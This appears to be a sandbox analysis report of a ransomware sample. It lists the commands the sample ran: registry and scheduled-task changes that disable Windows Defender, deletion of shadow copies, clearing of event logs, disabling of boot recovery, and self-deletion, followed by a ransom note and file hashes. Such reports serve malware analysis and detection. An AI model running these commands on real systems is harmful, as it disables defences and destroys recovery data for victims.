C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2484
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3064
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1636
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2116
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2256
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2032
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1640
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2184
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:320
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:472
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2676
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2512
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2404
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2268
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:644
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1316
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2272
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1224
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2428
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1920
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2168
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1740
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2328
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:720
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:896
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1064
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:604
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2968
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1864
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1868
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2312
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1324
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2364
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2372
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:900
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2144
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2568
-
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\K8zJ_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:2088
-
-
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"2⤵
- Deletes itself
PID:2296 -
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:880
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2108
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\K8zJ_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2500
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f939d786e1fb30d287357d553719cf88
SHA1b5001e66047bb37310e8b9c78fef2d1ef6443e1f
SHA2565f3f1382a950d3c94afafb319c58b2b3731bce694966973685aad6bf9b156cad
SHA5128da927a8e9425e10a29daeb4b93f66484eca789805dd66a29bfee52b59c2a6df9895bc5dfd814eca788ed27b53463cdd4e8983ff2fc04496d5998a4193f3c2a9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fe895c3f05f89040d78c8584e697b1e4
SHA1aee224894cac0d744f18fb8cb63b62c7fe252c18
SHA25698dcb631ea4d3d377644ee8a2fabf2f5fbc98eea417270ff2cf1179d91fed399
SHA5123c250be1cee7187b3d20426fa99d81e8458e7dc7a844961658b36daf0ab8c724ae801e5e1c1a5dc3e713c15cfdde345497a26e8605bb300308158e174bcb5af7
-
Filesize
30.5MB
MD5d3185cf3439b28dd72352d664af37ed3
SHA1b9b269fe95e14faf16bd827b455f06e8ff20796f
SHA2569e959b2dc17eda3fdfb7a96b81b83ec57976cf922edb5535a93dc999cf64cd7f
SHA5127ee05e5fd9668024d1a37afc7a8ae3a4c315236f1caa1bce38b92b3243aa5db27b64b20a8255e3263496904d801c44dfe4e4171f1c6110f43dabd27b7cf05e3c